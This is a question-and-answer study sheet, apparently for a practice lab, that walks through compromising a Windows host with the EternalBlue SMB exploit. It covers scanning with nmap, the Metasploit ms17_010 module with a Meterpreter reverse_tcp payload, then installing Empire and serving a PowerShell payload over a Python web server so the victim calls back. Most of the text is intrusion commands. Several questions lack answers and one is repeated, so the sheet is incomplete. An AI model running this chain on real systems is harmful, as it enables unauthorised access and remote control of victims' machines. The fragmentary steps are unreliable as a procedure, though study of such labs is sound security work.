What nmap command to tell if vulnerable to eternalblue?
nmap -p 445 –script safe -Pn -n 10.10.10.40
How to launch Metasploit?
msfconsole
What do you do after you launch metasploit?
- search ms17-010
What do you do after you locate the eternalblue metasploit module?
- msf5> use exploit/windows/smb/ms17_010_eternalblue
What do you do after loading the metasploit module?
- > set payload windows/x64/meterpreter/reverse_tcp
What two values do you set for the reverse tcp payload before exploiting?
What is the final step for the eternalblue module after configuring the settings?
- > exploit -j
How do you tell if you have active sessions after running the reverse_tcp payload exploit?
> sessions -i
What do you do after you have a victim machine connected with an reverse tcp payload for the eternalblue exploit?
- Use Empire after it has been installed.
How do you install Empire if it is not installed?
- install, run setup, and then launch Empire > cd /opt > git clone https://github.com/EmpireProject/Empire -b dev > cd Empire > cd Setup > ./install.sh > cd /opt/Empire > ./empire
How do you get the PowerShell http query from Empire?
What do you do after you create the PowerShell payload?
What do you do after creating the empire.ps1 file in the http directory?
> pypton -m SimpleHTTPServer 80
What do you do after launching the python simple server?
*** This results in the victim machine connecting to Empire
What do you do after the victim machine connects to Empire?
What do you do after generating the reverse http payload with unicorn?
What do you do after injecting the meterpreter1 shellcode into powershell process?
What do you do after launching the python simple server?